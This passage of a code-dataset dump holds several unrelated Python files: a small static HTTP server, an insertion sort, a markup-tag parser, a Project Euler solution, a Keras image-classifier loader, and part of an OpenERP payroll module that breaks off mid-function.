try:\n if self.path in (\"\", \"/\"):\n filepath = \"index.html\"\n else:\n filepath = self.path.lstrip(\"/\")\n\n f = open('html/%s' % filepath, \"rb\")\n\n except IOError:\n self.send_error(404, 'File Not Found: %s ' % filepath)\n\n else:\n self.send_response(200)\n #this part handles the mimetypes for you.\n mimetype, _ = mimetypes.guess_type(filepath)\n #print(mimetype)\n self.send_header('Content-type', mimetype)\n self.end_headers()\n for s in f:\n self.wfile.write(s)\n\n\nif __name__ == '__main__':\n server = http.server.HTTPServer\n httpd = server(('', 8082), ApplicationServer)\n try:\n print('Serving from now. Please, open \"http://localhost:8082\" in any internet browser.')\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass\n httpd.server_close()\n","sub_path":"ApplicationServer.py","file_name":"ApplicationServer.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"70938539","text":"import random\nRange = 100\nLength = 5\nlist = random.sample(range(Range),Length) \n#在指定序列中随机获取指定长度片段\nprint('before sort:',list)\nfor i in range(1,Length): #默认第一个元素已经在有序序列中,从后面元素开始插入 \n for j in range(i,0,-1): \n\t#逆向遍历比较,交换位置实现插入 \n if list[j] < list[j-1]: \n list[j],list[j-1] = list[j-1],list[j]\nprint('after sort:',list)\n\n","sub_path":"notes/VC/排序算法/insert/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"496665629","text":"import copy\n\nfrom .caExceptions import CodeParserException\n\ncontextChar = '@'\ncontentChar = '$'\nmetaChar = '^'\n\ndef lineAndIndexCounter(targtString):\n sIter = enumerate(targtString.__iter__())\n lineCount = 1\n while True:\n i, char = next(sIter)\n if char == '\\n':\n lineCount += 1\n yield lineCount, i, char\n\nclass parseTree(object):\n def __init__(self, targetString, targetPath = None):\n if targetPath is not None:\n self.files = [targetPath]\n else:\n self.files = []\n sIter = lineAndIndexCounter(targetString)\n self.topNode = Node(sIter, 0, -1, '', targetPath)\n self.tagSegments = self.topNode.tagSections\n tmpTagDict = {}\n for seg in self.tagSegments:\n try:\n tmpTagDict[seg.tag].append(seg)\n except KeyError:\n tmpTagDict[seg.tag] = [seg]\n self._tags = None\n\n def getTags(self):\n if self._tags is None:\n tmpTagDict = {}\n for seg in self.tagSegments:\n try:\n tmpTagDict[seg.tag].append(seg)\n except KeyError:\n tmpTagDict[seg.tag] = [seg]\n self._tags = {tag : makeCode(tag, sections = segs) for tag, segs in tmpTagDict.items()}\n return self._tags\n\n def setTags(self, value):\n self._tags = value\n\n def delTags(self):\n del self._tags\n\n tags = property(getTags, setTags, delTags, \"The tags of the tree\")\n\n def __iadd__(self, other):\n self.topNode += other.topNode\n newTags = {}\n for tagString, tagObj in self.tags.items():\n if tagString in other.tags:\n newTags[tagString] = tagObj + other.tags[tagString]\n else:\n newTags[tagString] = tagObj\n for tagString, tagObj in ((s, t) for s, t in other.tags.items() if s not in newTags):\n newTags[tagString] = tagObj\n self.tags = newTags\n self.files += other.files\n return self\n\nclass Node(object):\n def __init__(self, sIter, startLine, startIndex, startCode, filePath):\n if startCode == '[':\n self.code = True\n self._raw = ''\n else:\n self.code = False\n self._raw = startCode\n self.tokens = None\n self.contents = [] #Nice values\n self._contents = [] #Raw values\n self.line = startLine\n self.index = startIndex\n self.file = filePath\n\n self._children = None\n self._containedSections = None\n self._tagSections = None\n self._codes = None\n\n stopIter = False\n inBraces = False\n currentString = ''\n currentIndex = 0\n currentLine = 1\n freshString = True\n\n while not stopIter:\n try:\n line, i, char = next(sIter)\n if not inBraces:\n self._raw += char\n if freshString:\n currentLine, currentIndex, currentString = line, i, ''\n freshString = False\n except StopIteration:\n if inBraces:\n currentString += '](' + self.tokens\n self._contents.append((currentLine, currentIndex, currentString))\n self.code = False\n stopIter = True\n else:\n if inBraces:\n if char == ')':\n stopIter = True\n else:\n self.tokens += char\n elif char == '[':\n self._contents.append((currentLine, currentIndex, currentString))\n self._raw = self._raw[:-1]\n innerCode = Node(sIter, line, i, char, self.file)\n self._raw += innerCode.raw\n self._contents.append(innerCode)\n freshString = True\n elif char == ']' and self.code:\n try:\n line, i, char = next(sIter)\n self._raw += char\n except StopIteration:\n stopIter = True\n else:\n if char == '(':\n self.tokens = ''\n inBraces = True\n self._contents.append((currentLine, currentIndex, currentString))\n self._raw = self._raw[:-2]\n elif char == '[':\n self._contents.append((currentLine, currentIndex, currentString))\n innerCode = Node(sIter, line, i, char, self.file)\n self._raw += innerCode.raw\n self._contents.append(innerCode)\n self.code = False\n stopIter = True\n else:\n currentString += ']' + char\n self._contents.append((currentLine, currentIndex, currentString))\n stopIter = True\n self.code = False\n else:\n currentString += char\n\n for val in self._contents:\n if isinstance(val, Node):\n self.contents.append(val)\n elif isinstance(val, tuple):\n self.contents.append(val[2])\n else:\n raise CodeParserException(\"Unxepected object: {} in _contents\".format(val))\n\n def __add__(self, other):\n tmpSelf = copy.copy(self)\n tmpSelf._contents.append(other._contents)\n tmpSelf.contents.append(other.contents)\n #reset the memoizations\n tmpSelf._children = None\n tmpSelf._containedSections = None\n tmpSelf._tagSections = None\n tmpSelf._codes = None\n return tmpSelf\n\n def __iadd__(self, other):\n self._contents.append(other._contents)\n self.contents.append(other.contents)\n #reset the memoizations\n self._children = None\n self._containedSections = None\n self._tagSections = None\n self._codes = None\n return self\n\n @property\n def raw(self):\n #TODO Consider how to handle this\n return self._raw\n\n @property\n def children(self):\n if self._children is None:\n children = []\n for val in self._contents:\n if isinstance(val, tuple):\n pass\n elif isinstance(val, Node):\n children.append(val)\n else:\n raise CodeParserException(\"Node {} contains a non-Node, non-string object: {}\".format(self, val))\n self._children = children\n return self._children\n\n @property\n def containedSections(self):\n if self._containedSections is None:\n self._containedSections = self.codes\n for child in self.children:\n self._containedSections += child.codes\n return self._containedSections\n\n @property\n def tagSections(self):\n if self._tagSections is None:\n self._tagSections = self.codes\n for c in self.children:\n self._tagSections += c.tagSections\n return self._tagSections\n\n @property\n def codes(self):\n def readCodes(codeStr):\n codes = codeStr.split(' ')\n retCodes = []\n for code in codes:\n if len(code) > 1 and code[0] in codeSectionTypes:\n retCodes.append((code[0], code))\n return retCodes\n\n if self._codes is None:\n self._codes = []\n if self.code:\n tagStrings = readCodes(self.tokens)\n for codeChar, code in tagStrings:\n self._codes.append(codeSectionTypes[codeChar](self._contents, code, self.line, self.index, self.raw, self.file))\n return self._codes\n\n def __repr__(self):\n if self.code:\n s = \"< Node [{}]({}) >\".format(len(self._raw), self.tokens)\n else:\n s = \"< Node [{}] >\".format(len(self._raw))\n return s\n\nclass CodeSection(object):\n def __init__(self, contents, tag, startLine, startIndex, startRaw, filePath):\n self.contents = contents\n self.tag = tag\n self.line = startLine\n self.index = startIndex\n self.file = filePath\n self._raw = startRaw\n self._children = None\n\n def __repr__(self):\n s = \"< CodeSection [{}]({}) >\".format(len(self._raw), self.tag)\n return s\n\n def __str__(self):\n s = \"From {}\\nLine {}\\tCharacter Number {}\\tLength {}\\n{}\".format(self.file, self.line, self.index + 1, len(self), self.raw)\n return s\n\n def __hash__(self):\n return hash(self.raw + self.tag + str(self.index))\n\n def __len__(self):\n return len(self.raw)\n\n def __contains__(self, tag):\n for c in self.children:\n if c.tag == tag:\n return True\n return False\n\n def __getitem__(self, tag):\n retTags = []\n for c in self.children:\n for sec in c.codes:\n if sec.tag == tag:\n retTags.append(sec)\n return retTags\n\n @property\n def raw(self):\n return self._raw\n\n @property\n def children(self):\n if self._children is None:\n children = []\n for val in self.contents:\n if isinstance(val, tuple):\n pass\n elif isinstance(val, Node):\n children.append(val)\n else:\n raise CodeParserException(\"Node {} contains a non-Node, non-string object: {}\".format(self, val))\n self._children = children\n return self._children\n\nclass ContextCodeSection(CodeSection):\n pass\n\nclass ContentCodeSection(CodeSection):\n pass\n\nclass MetaCodeSection(CodeSection):\n pass\n\ncodeSectionTypes = {\n contextChar : ContextCodeSection,\n contentChar : ContentCodeSection,\n metaChar : MetaCodeSection,\n}\n\nclass Tag(object):\n def __init__(self, sections, tag):\n for s in sections:\n if s.tag != tag:\n raise CodeParserException(\"Tag objects can ony be made from CodeSections with the same tag. A tag of {} was found when {} was expected\".format(s.tag, tag))\n self.sections = sections\n self._containedTags = None\n self._containedSections = None\n self._raw = None\n self.tag = tag\n self.description = None\n self.extraInfo = None\n self.unDocumented = True\n\n def __add__(self, other):\n if self.tag != other.tag:\n raise CodeParserException(\"Tags can only be added togehter if they have the same tag string, {} cannot be added to {}\".format(self.tag, other.tag))\n return Tag(self.tag, self.sections + other.sections)\n\n def __len__(self):\n return len(self.sections)\n\n def __getitem__(self, tag):\n retSections = []\n for sec in self.sections:\n retSections += sec[tag]\n return retSections\n\n @property\n def raw(self):\n if self._raw is None:\n self._raw = []\n for sec in self.sections:\n self._raw.append(sec.raw)\n return self._raw\n\n @property\n def containedSections(self):\n if self._containedSections is None:\n self._containedSections = []\n for sec in self.sections:\n for seg in [node.containedSections for node in sec.children]:\n self._containedSections += seg\n return self._containedSections\n\n @property\n def containedTags(self):\n if self._containedTags is None:\n self._containedTags = []\n for sec in self.containedSections:\n if sec.tag not in self._containedTags:\n self._containedTags.append(sec.tag)\n return self._containedTags\n\n def __repr__(self):\n if self.unDocumented:\n s = \"< {} {} [unDocumented] >\".format(type(self).__qualname__, self.tag)\n elif self.description:\n s = \"< {} {} [{}] >\".format(type(self).__qualname__, self.tag, self.description)\n else:\n s = \"< {} {} [No Description] >\".format(type(self).__qualname__, self.tag)\n return s\n\n def __str__(self):\n s = \"{}\\t{}\\tcount {}\\t: \".format(type(self).__qualname__, self.tag, len(self))\n if self.unDocumented:\n s += \"unDocumented\"\n elif self.description:\n s += \"{}\".format(self.description)\n else:\n s += \"No Description\"\n return s\n\n def addDocs(self, dataDict):\n if 'description' in dataDict:\n self.description = dataDict.pop('description')\n if len(dataDict) > 0:\n self.extraInfo = dataDict\n self.unDocumented = False\n\nclass ContextCode(Tag):\n pass\n\nclass ContentCode(Tag):\n pass\n\nclass MetaCode(Tag):\n pass\n\ncodeTypes = {\n contextChar : ContextCode,\n contentChar : ContentCode,\n metaChar : MetaCode,\n}\n\ndef makeCode(tagString, sections = None, dataDict = None):\n if sections is None:\n sections = []\n try:\n tag = codeTypes[tagString[0]](sections, tagString)\n except KeyError:\n raise KeyError(\"{} is not the begining of a code.\".format(tagString[0]))\n if dataDict is not None:\n tag.addDocs(dataDict)\n return tag\n","sub_path":"caMarkdown/codes.py","file_name":"codes.py","file_ext":"py","file_size_in_byte":13497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"412295369","text":"#!/usr/bin/env python3\n#Solution to Problem 85\nfrom time import time\nfrom math import fabs\n\ndef factorial(n):\n f = 1\n while n:\n f *= n\n n -= 1\n return f\n\ndef choose(n,k):\n return factorial(n)//(factorial(k)*factorial(n-k))\n\ndef starsbars(n,k):\n return choose(n+k-1,k)\n\ndef rects(w,h):\n \"\"\"For a rectangles height and width, the number of rectangles\n is just the number of ways we can drop two vertical line marbles\n into h buckets * the number of ways we can drop two horizontal\n line marbles into w buckets.\"\"\"\n return starsbars(w,2)*starsbars(h,2)\n\nclosest = 0\ntarget = 2000000\nstart = time()\nx,y = 0,0\nfor w in range(1,1000): #Limits found by trial and error\n for h in range(w,1000):\n test = rects(w,h)\n if fabs(target-test) < fabs(target-closest):\n closest = test\n x,y = w,h\n if test > target:\n break\nprint(\"{}x{} = {} : {}\".format(x,y,x*y,closest))\nprint(\"Time: {}s\".format(time()-start))\n","sub_path":"e85.py","file_name":"e85.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"436095458","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 28 14:37:18 2018\n\n@author: admin\n\"\"\"\n\nfrom keras.models import model_from_json\njson_file = open('model.json','r')\nloaded_model_json = json_file.read()\njson_file.close()\nloaded_model = model_from_json(loaded_model_json)\nloaded_model.load_weights(\"model.h5\")\nprint(\"Loaded Model from disk\")\nloaded_model.compile(loss='categorical_crossentropy', optimizer='adam',metrics=['accuracy'])\n#loaded_model.predict()\n\nfrom keras.preprocessing import image\nimport numpy as np\ntest_image = image.load_img('dataset/sample1.jpg', target_size = (64, 64))\ntest_image = image.img_to_array(test_image)\ntest_image = np.expand_dims(test_image, axis = 0)\nresult = loaded_model.predict(test_image)\nif result[0][0] == 1:\n prediction = 'dog'\nelse:\n prediction = 'cat'\nprint(prediction)\n","sub_path":"aiml/loadingCNN.py","file_name":"loadingCNN.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"479562546","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 Tiny SPRL ().\n#\n# Thinkopen - Portugal & Brasil\n# Copyright (C) Thinkopen Solutions ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nimport time\nfrom openerp import netsvc\nfrom openerp import tools\nfrom openerp.tools.translate import _\nfrom openerp.osv import fields, osv\nfrom datetime import date\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom dateutil import relativedelta\nfrom math import modf\nimport openerp.addons.decimal_precision as dp\n\n_Months_List_trans = {'01':'Janeiro',\n '02':'Fevereiro',\n '03':'Março',\n '04':'Abril',\n '05':'Maio',\n '06':'Junho', \n '07':'Julho', \n '08':'Agosto', \n '09':'Setembro',\n '10':'Outubro',\n '11':'Novembro', \n '12':'Dezembro'}\n\n_Months_List = [('01','January'), ('02','February'), ('03','March'), ('04','April'),\n ('05','May'), ('06','June'), ('07','July'), ('08','August'), ('09','September'),\n ('10','October'), ('11','November'), ('12','December')]\n\nclass hr_contract(osv.osv):\n \"\"\"\n Employee contract based on the visa, work permits\n allows to configure different Salary structure\n \"\"\"\n \n _history_vals_log = [{'wage':'Salario'}]\n\n _inherit = 'hr.contract'\n _name='hr.contract'\n _description = 'Employee Contract'\n \n def write(self, cr, uid, ids, vals, context=None):\n hr_employee_obj = self.pool.get('hr.employee')\n ir_model_obj = self.pool.get('ir.model')\n model_obj_id = ir_model_obj.search(cr, uid, [('model','=','hr.contract')])\n if context is None:\n context = {}\n for line in self.browse(cr, uid, ids):\n for value in vals:\n previous_value = self.read(cr, uid, line.id, [value])[value]\n if not any(d.has_key(value) for d in self._history_vals_log):\n continue\n index = next(index for (index, d) in enumerate(self._history_vals_log) if d.has_key(value))\n object = self._history_vals_log[index][value]\n change = '%s - Referencia contrato %s' % (vals[value], line.name)\n hr_employee_obj.write_history_line(cr, uid, ids, line.employee_id.id, model_obj_id[0], value, object, previous_value, change, context)\n super(hr_contract, self).write(cr, uid, ids, vals, context=context)\n return True\n\n _columns = {\n 'permit_no': fields.char('Work Permit No', size=256, required=False, readonly=False),\n 'visa_no': fields.char('Visa No', size=64, required=False, readonly=False),\n 'visa_expire': fields.date('Visa Expire Date'),\n 'insurance_name': fields.char('Insurance', size=256, required=False, readonly=False),\n 'insurance_no': fields.char('Insurance No', size=256, required=False, readonly=False),\n #'meal_option': fields.selection([('cash','Cash'),('coupons', 'Meal Coupons')], 'Meal Option'),\n 'working_hours': fields.many2one('resource.calendar','Working Schedule', required=True),\n 'month_vacation': fields.selection(_Months_List, \"Month Vacation\"),\n 'month_christmas': fields.selection(_Months_List, \"Month Vacation Christmas\"),\n 'day_meal': fields.float(\"Day Meal Value\", digits_compute=dp.get_precision('Payroll')),\n\n }\nhr_contract()\n\n\n\nclass hr_payslip_run(osv.osv):\n _inherit = 'hr.payslip.run'\n \n def final_verify_sheet(self, cr, uid, ids, context=None):\n \"\"\"\n JMG: New method to calculate the payment advice lines\n \"\"\"\n slip_pool = self.pool.get('hr.payslip')\n advice_pool = self.pool.get('hr.payroll.advice')\n advice_line_pool = self.pool.get('hr.payroll.advice.line')\n sequence_pool = self.pool.get('ir.sequence')\n users_pool = self.pool.get('res.users')\n banks = []\n comp_acc = {}\n advice_lines = { }\n company = users_pool.browse(cr, uid, uid, context=context).company_id\n for reg in self.browse(cr, uid, ids, context=context):\n if not company.bank_ids:\n raise osv.except_osv(_('Error !'), _('No bank(s) defined in %s') % (company.name))\n # get all company banks\n for acc_bank in company.bank_ids:\n banks.append(acc_bank.bank.id)\n advice_lines[acc_bank.bank.id] = []\n comp_acc[acc_bank.bank.id] = acc_bank.id \n for slip in reg.slip_ids:\n if not slip.employee_id.bank_account_id.acc_number:\n raise osv.except_osv(_('Error !'), _('Please define bank account for the %s employee') % (slip.employee_id.name))\n if not slip.employee_id.bank_account_id.bank.id in banks:\n raise osv.except_osv(_('Error !'), _('Sem banco na empresa para o funcionário %s ') % (slip.employee_id.name))\n value_net = [x.amount for x in slip.line_ids if\n #x.slip_id.state == 'done' and \n x.salary_rule_id.category_id.code in ('NET')\n ]\n if not value_net:\n raise osv.except_osv(_('Error !'), _('Amount invalid for the %s employee. Category \"NET\" missing in payslip.') % (slip.employee_id.name))\n \n advice_lines[slip.employee_id.bank_account_id.bank.id].append({\n 'name':slip.employee_id.bank_account_id.acc_number,\n 'employee_id':slip.employee_id.id,\n 'amount':value_net[0],\n #'bysal':slip.net\n })\n for advice in advice_lines.iterkeys():\n if advice_lines[advice]:\n pid = advice_pool.create(cr,uid,{\n 'name': 'Payment Advice %s' % (company.name),\n# 'number': sequence_pool.get(cr, uid, 'payment.advice'),\n 'register_id':reg.id,\n 'bank_id' : comp_acc[advice],\n 'compute_date': date(int(reg.date_start.split('-')[0]),int(reg.date_start.split('-')[1]), 1) ,\n }, context=context)\n for line in advice_lines[advice]:\n lid =advice_line_pool.create(cr,uid,line,context=context)\n advice_line_pool.write(cr,uid,[lid],{'advice_id' : pid})\n return True\n \n def close_payslip_run(self, cr, uid, ids, context=None):\n wf_service = netsvc.LocalService('workflow')\n self.final_verify_sheet(cr, uid, ids, context)\n # Validate all slips in draft associated \n for run in self.browse(cr, uid, ids):\n for slip in run.slip_ids: \n if slip.state not in ('draft'):\n continue\n #wf_service.trg_validate(uid, 'hr.payslip', slip.id, 'hr_verify_sheet', cr)\n res = super(hr_payslip_run, self).close_payslip_run(cr, uid, ids, context)\n return res \n\nclass hr_payslip(osv.osv):\n '''\n Pay Slip\n '''\n\n _name = 'hr.payslip'\n _inherit = 'hr.payslip'\n _order = 'number desc'\n _columns = {\n 'adhoc_rules': fields.many2many('hr.salary.rule', 'rule_adhoc_payslip', 'rule_id', 'payslip_id', 'Ad-hoc Rules', readonly=True, states={'draft': [('readonly', False)]}),\n }\n \n def cancel_sheet(self, cr, uid, ids, context=None):\n register_line_pool = self.pool.get('hr.contribution.register.line')\n #advance_pool = self.pool.get('')\n for slip in self.browse(cr, uid, ids, context=context):\n register_line_pool.unlink(cr,uid,register_line_pool.search(cr,uid,[('payslip_id','=',slip.id)]))\n return super(hr_payslip, self).cancel_sheet(cr, uid, ids, context=context)\n \n def draft(self, cr, uid, ids, context=None):\n \n return self.write(cr, uid, ids, {'state':'draft'}, context=context)\n \n #to add our own ad-hoc rules\n def get_extra_rules(self, cr, uid, payslip_id, context):\n payslip_obj = self.pool.get('hr.payslip')\n slip = payslip_obj.browse(cr, uid, payslip_id, context=context)\n return slip.adhoc_rules\n \n def process_input_lines(self, cr, uid, input_line_ids):\n pool = self.pool.get('hr.payslip.input')\n codes = set()\n for state, id, vals in input_line_ids:\n if state == 0:\n codes.add(vals['code'])\n elif state == 4:\n [input] = pool.browse(cr, uid, [id])\n codes.add(input.code)\n return codes\n \n def onchange_adhoc_rules(self, cr, uid, ids, contract_id, adhoc_rules, input_line_ids):\n if not contract_id:\n raise osv.except_osv(_(\"Error\"), _(\"You must select an contract first\"))\n rules_pool = self.pool.get('hr.salary.rule')\n codes = self.process_input_lines(cr, uid, input_line_ids)\n# [[_, _, rule_ids]] = adhoc_rules \n for rule in rules_pool.browse(cr, uid, rule_ids):\n if rule.input_ids:\n for input in rule.input_ids:\n if input.code not in codes:\n input_line_ids.append( (0, False, {\n 'name': input.name,\n 'code': input.code,\n 'contract_id': contract_id,\n } ) )\n \n return {'value': {'input_line_ids': input_line_ids}}\n \n\n def get_payment_advance(self, cr, uid, from_date, to_date, employee_id):\n return 0.0\n\n def get_payslip_lines(self, cr, uid, contract_ids, payslip_id, lock_dict,context):\n \"\"\"\n Inherit method to round amount of tax salary rule = DIR\n \"\"\"\n def _sum_salary_rule_category(localdict, category, amount):\n if category.parent_id:\n localdict = _sum_salary_rule_category(localdict, category.parent_id, amount)\n localdict['categories'].dict[category.code] = category.code in localdict['categories'].dict and localdict['categories'].dict[category.code] + amount or amount\n return localdict\n\n class BrowsableObject(object):\n def __init__(self, pool, cr, uid, employee_id, dict):\n self.pool = pool\n self.cr = cr\n self.uid = uid\n self.employee_id = employee_id\n self.dict = dict\n\n def __getattr__(self, attr):\n return attr in self.dict and self.dict.__getitem__(attr) or 0.0\n\n class InputLine(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = datetime.now().strftime('%Y-%m-%d')\n result = 0.0\n self.cr.execute(\"SELECT sum(amount) as sum\\\n FROM hr_payslip as hp, hr_payslip_input as pi \\\n WHERE hp.employee_id = %s AND hp.state = 'done' \\\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\",\n (self.employee_id, from_date, to_date, code))\n res = self.cr.fetchone()[0]\n return res or 0.0\n\n class WorkedDays(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n def _sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = datetime.now().strftime('%Y-%m-%d')\n result = 0.0\n self.cr.execute(\"SELECT sum(number_of_days) as number_of_days, sum(number_of_hours) as number_of_hours\\\n FROM hr_payslip as hp, hr_payslip_worked_days as pi \\\n WHERE hp.employee_id = %s AND hp.state = 'done'\\\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\",\n (self.employee_id, from_date, to_date, code))\n return self.cr.fetchone()\n\n def sum(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[0] or 0.0\n\n def sum_hours(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[1] or 0.0\n \n \n\n class Payslips(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = datetime.now().strftime('%Y-%m-%d')\n self.cr.execute(\"SELECT sum(case when hp.credit_note = False then (pl.total) else (-pl.total) end)\\\n FROM hr_payslip as hp, hr_payslip_line as pl \\\n WHERE hp.employee_id = %s AND hp.state = 'done' \\\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pl.slip_id AND pl.code = %s\",\n (self.employee_id, from_date, to_date, code))\n res = self.cr.fetchone()\n return res and res[0] or 0.0\n \n def extrahours(self,from_date,to_date=None):\n if to_date is None:\n to_date = datetime.now().strftime('%Y-%m-%d')\n self.cr.execute(\"SELECT sum(case when hao.overtime > 2 then 2 else hao.overtime end) \\\n FROM hr_attendance_overtime hao \\\n WHERE hao.employee_id = %s AND hao.state = 'confirmed' \\\n AND hao.overtime_date >= %s AND hao.overtime_date <= %s \",\n (self.employee_id, from_date, to_date))\n res = self.cr.fetchone()\n return res and res[0] or 0\n \n def get_due_payment(self, from_date, to_date=None):\n value = self.pool.get('hr.payslip').get_payment_advance(cr, uid, from_date, to_date, self.employee_id)\n return value and value or 0.0\n #we keep a dict with the result because a value can be overwritten by another rule with the same code\n result_dict = {}\n rules = {}\n categories_dict = {}\n blacklist = []\n payslip_obj = self.pool.get('hr.payslip')\n inputs_obj = self.pool.get('hr.payslip.worked_days')\n obj_rule = self.pool.get('hr.salary.rule')\n payslip = payslip_obj.browse(cr, uid, payslip_id, context=context)\n worked_days = {}\n for worked_days_line in payslip.worked_days_line_ids:\n worked_days[worked_days_line.code] = worked_days_line\n inputs = {}\n for input_line in payslip.input_line_ids:\n inputs[input_line.code] = input_line\n\n categories_obj = BrowsableObject(self.pool, cr, uid, payslip.employee_id.id, categories_dict)\n input_obj = InputLine(self.pool, cr, uid, payslip.employee_id.id, inputs)\n worked_days_obj = WorkedDays(self.pool, cr, uid, payslip.employee_id.id, worked_days)\n payslip_obj = Payslips(self.pool, cr, uid, payslip.employee_id.id, payslip)\n rules_obj = BrowsableObject(self.pool, cr, uid, payslip.employee_id.id, rules)\n\n localdict = {'categories': categories_obj, 'rules': rules_obj, 'payslip': payslip_obj, 'worked_days': worked_days_obj, 'inputs': input_obj}\n #get the ids of the structures on the contracts and their parent id as well\n structure_ids = self.pool.get('hr.contract').get_all_structures(cr, uid, contract_ids, context=context)\n #get the rules of the structure and thier children\n rule_ids = self.pool.get('hr.payroll.structure').get_all_rules(cr, uid, structure_ids, context=context)\n \n # TKO: adding adhoc rules with permission of group_adhoc_rules\n group_adhoc_rules_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'tkao_hr_ao', 'group_adhoc_rules')[1]\n group_adhoc_rules = self.pool.get('res.groups').browse(cr, uid, group_adhoc_rules_id, context=context)\n if group_adhoc_rules and uid in [x.id for x in group_adhoc_rules.users]:\n rules_ad_hoc = self.get_extra_rules(cr, uid, payslip_id, context=context)\n rule_ids += obj_rule._recursive_search_of_rules(cr, uid, rules_ad_hoc, context=context)\n \n #run the rules by sequence\n sorted_rule_ids = [id for id, sequence in sorted(rule_ids, key=lambda x:x[1])]\n\n for contract in self.pool.get('hr.contract').browse(cr, uid, contract_ids, context=context):\n employee = contract.employee_id\n localdict.update({'employee': employee, 'contract': contract})\n for rule in obj_rule.browse(cr, uid, sorted_rule_ids, context=context):\n key = rule.code + '-' + str(contract.id)\n localdict['result'] = None\n localdict['result_qty'] = 1.0\n lock = False\n #check if the rule can be applied\n if obj_rule.satisfy_condition(cr, uid, rule.id, localdict, context=context) and rule.id not in blacklist:\n #compute the amount of the rule\n amount, qty, rate = obj_rule.compute_rule(cr, uid, rule.id, localdict, context=context)\n #check if there is already a rule computed with that code\n previous_amount = rule.code in localdict and localdict[rule.code] or 0.0\n # If user locked amount for rule, replace amount\n if rule.code in lock_dict:\n #tot_rule = lock_dict[rule.code]\n amount = lock_dict[rule.code] \n lock = True\n #set/overwrite the amount computed for this rule in the localdict\n tot_rule = amount * qty * rate / 100.0\n # if rule is a tax deduction, round to the lowest number\n if rule.code == 'DIR':\n rest, tot_rule = modf(tot_rule)\n localdict[rule.code] = tot_rule\n rules[rule.code] = rule\n #sum the amount for its salary category\n localdict = _sum_salary_rule_category(localdict, rule.category_id, tot_rule - previous_amount)\n #create/overwrite the rule in the temporary results\n result_dict[key] = {\n 'salary_rule_id': rule.id,\n 'contract_id': contract.id,\n 'name': rule.name,\n 'code': rule.code,\n 'category_id': rule.category_id.id,\n 'sequence': rule.sequence,\n 'appears_on_payslip': rule.appears_on_payslip,\n 'condition_select': rule.condition_select,\n 'condition_python': rule.condition_python,\n 'condition_range': rule.condition_range,\n 'condition_range_min': rule.condition_range_min,\n 'condition_range_max': rule.condition_range_max,\n 'amount_select': rule.amount_select,\n 'amount_fix': rule.amount_fix,\n 'amount_python_compute': rule.amount_python_compute,\n 'amount_percentage': rule.amount_percentage,\n 'amount_percentage_base': rule.amount_percentage_base,\n 'register_id': rule.register_id.id,\n 'amount': amount,\n 'employee_id': contract.employee_id.id,\n 'quantity': qty,\n 'rate': rate,\n 'lock' : lock,\n }\n else:\n #blacklist this rule and its children\n blacklist += [id for id, seq in self.pool.get('hr.salary.rule')._recursive_search_of_rules(cr, uid, [rule], context=context)]\n\n result = [value for code, value in result_dict.items()]\n return result\n \n def get_worked_day_lines(self, cr, uid, contract_ids, date_from, date_to, context=None):\n \"\"\"\n Overwriten method to map the code of employee leave and count also weekends in normal working days\n \"\"\"\n def was_on_leave(employee_id, datetime_day, context=None):\n res = False\n day = datetime_day.strftime(\"%Y-%m-%d\")\n holiday_ids = self.pool.get('hr.holidays').search(cr, uid, [('state','in',('validate','complete')),('employee_id','=',employee_id),('number_of_days','<',0),('date_from','<=',day),('date_to','>=',day)])\n if holiday_ids:\n # TKO: Map leave code \n res = { \n 'leave_type':self.pool.get('hr.holidays').browse(cr, uid, holiday_ids, context=context)[0].holiday_status_id.name,\n 'leave_code':self.pool.get('hr.holidays').browse(cr, uid, holiday_ids, context=context)[0].holiday_status_id.code,\n }\n return res\n\n res = []\n for contract in self.pool.get('hr.contract').browse(cr, uid, contract_ids, context=context):\n if not contract.working_hours:\n #fill only if the contract as a working schedule linked\n continue\n attendances = {\n 'name': (\"Normal Working Days paid at 100%\"),\n# 'name': (\"Dias trabalhados\"),\n 'sequence': 1,\n 'code': 'WORK100',\n 'number_of_days': 0.0,\n 'number_of_hours': 0.0,\n 'contract_id': contract.id,\n }\n leaves = {}\n day_from = datetime.strptime(date_from,\"%Y-%m-%d\")\n day_to = datetime.strptime(date_to,\"%Y-%m-%d\")\n nb_of_days = (day_to - day_from).days + 1\n for day in range(0, nb_of_days):\n 